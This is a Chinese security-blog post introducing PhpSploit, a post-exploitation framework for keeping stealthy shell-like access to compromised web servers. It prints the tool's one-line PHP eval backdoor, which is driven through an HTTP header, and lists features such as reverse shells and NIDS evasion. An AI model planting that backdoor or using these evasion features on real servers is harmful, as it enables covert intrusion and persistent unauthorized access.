PhpSploit:一款隐蔽性极强的后渗透利用框架

2018 年 1 月 24 日 黑白之道


今天给大家介绍的是一款名叫PhpSploit的远程控制框架,该工具可以帮助攻击者在客户端与Web服务器端之间建立隐蔽性极强的交互式链接(类似Shell)。简而言之,这是一款后渗透利用工具,它能够让攻击者与目标主机(例如被入侵的Web服务器)维持访问链接,并实现提权操作。

概述

该工具会对标准客户端请求以及Web服务器相关请求的HTTP头数据进行混淆处理,并利用一个小型的多态后门来实现隐蔽通信:


<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

功能介绍

效率高:

1.   提供了超过20款自动化后渗透利用工具;

2.   运行命令、浏览文件系统、绕过PHP安全限制;

3.   在目标客户端与攻击者端之间实现文件的上传和下载;

4.   通过本地文本编辑器编辑远程文件;

5.   在目标系统中运行SQL语句;

6.   生成反向TCP Shell;

隐蔽性强:

1.   专为偏执狂设计;

2.   日志分析以及NIDS签名检测机制几乎无法检测到它;

3.   绕过安全模式以及常见PHP安全限制;

4.   通信信息隐藏在HTTP头中;

5.   加载的Payload经过了混淆处理以绕过NIDS;

6.   支持http/https/socks4/socks5代理;

使用便捷:

1.   跨平台;

2.   强大的界面,完整的命令支持;

3.   提供了会话保存/加载功能;

4.   支持大型Payload,支持多重请求;

5.   提供了强大的、高度可配置的设置引擎;

6.   每一个设置(例如用户代理)都有多态模式;

7.   提供了完整的插件开发API;

支持的平台(攻击者端)

1.   GNU/Linux

2.   MacOS X

支持的平台(目标用户端)

1.   GNU/Linux

2.   BSDLike

3.   MacOS X

4.   WindowsNT

工具下载

【GitHub传送门】

你会喜欢


2017年最佳iPhone渗透APP及工具

挖掘利器Andro Tickler:安卓应用渗透测试和审核工具箱

低成本制作基于OpenWRT的渗透工具


登录查看更多
0

相关内容

Web Service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的互操作的应用程序。Web Service技术, 能使得运行在不同机器上的不同应用无须借助附加的、专门的第三方软件或硬件, 就可相互交换数据或集成。依据Web Service规范实施的应用之间, 无论它们所使用的语言、 平台或内部协议是什么, 都可以相互交换数据。Web Service是自描述、 自包含的可用网络模块, 可以执行具体的业务功能。
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
Python导论,476页pdf,现代Python计算
专知会员服务
260+阅读 · 2020年5月17日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
深度神经网络实时物联网图像处理,241页pdf
专知会员服务
76+阅读 · 2020年3月15日
【新书】Java企业微服务,Enterprise Java Microservices,272页pdf
【干货】大数据入门指南:Hadoop、Hive、Spark、 Storm等
专知会员服务
95+阅读 · 2019年12月4日
后渗透利用msf关闭防火墙
黑白之道
8+阅读 · 2019年8月24日
用Now轻松部署无服务器Node应用程序
前端之巅
16+阅读 · 2019年6月19日
渗透某德棋牌游戏
黑白之道
12+阅读 · 2019年5月17日
Kali Linux 渗透测试:密码攻击
计算机与网络安全
16+阅读 · 2019年5月13日
从webview到flutter:详解iOS中的Web开发
前端之巅
5+阅读 · 2019年3月24日
如何用GitLab本地私有化部署代码库?
Python程序员
9+阅读 · 2018年12月29日
这10个开源人工智能项目,你必须了解!
大数据技术
9+阅读 · 2018年1月2日
开源巨献:阿里巴巴最热门29款开源项目
算法与数据结构
5+阅读 · 2017年7月14日
Arxiv
5+阅读 · 2019年8月22日
Dynamic Transfer Learning for Named Entity Recognition
Arxiv
3+阅读 · 2018年12月13日
Arxiv
6+阅读 · 2018年5月18日
VIP会员
相关VIP内容
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
Python导论,476页pdf,现代Python计算
专知会员服务
260+阅读 · 2020年5月17日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
深度神经网络实时物联网图像处理,241页pdf
专知会员服务
76+阅读 · 2020年3月15日
【新书】Java企业微服务,Enterprise Java Microservices,272页pdf
【干货】大数据入门指南:Hadoop、Hive、Spark、 Storm等
专知会员服务
95+阅读 · 2019年12月4日
相关资讯
后渗透利用msf关闭防火墙
黑白之道
8+阅读 · 2019年8月24日
用Now轻松部署无服务器Node应用程序
前端之巅
16+阅读 · 2019年6月19日
渗透某德棋牌游戏
黑白之道
12+阅读 · 2019年5月17日
Kali Linux 渗透测试:密码攻击
计算机与网络安全
16+阅读 · 2019年5月13日
从webview到flutter:详解iOS中的Web开发
前端之巅
5+阅读 · 2019年3月24日
如何用GitLab本地私有化部署代码库?
Python程序员
9+阅读 · 2018年12月29日
这10个开源人工智能项目,你必须了解!
大数据技术
9+阅读 · 2018年1月2日
开源巨献:阿里巴巴最热门29款开源项目
算法与数据结构
5+阅读 · 2017年7月14日
Top
微信扫码咨询专知VIP会员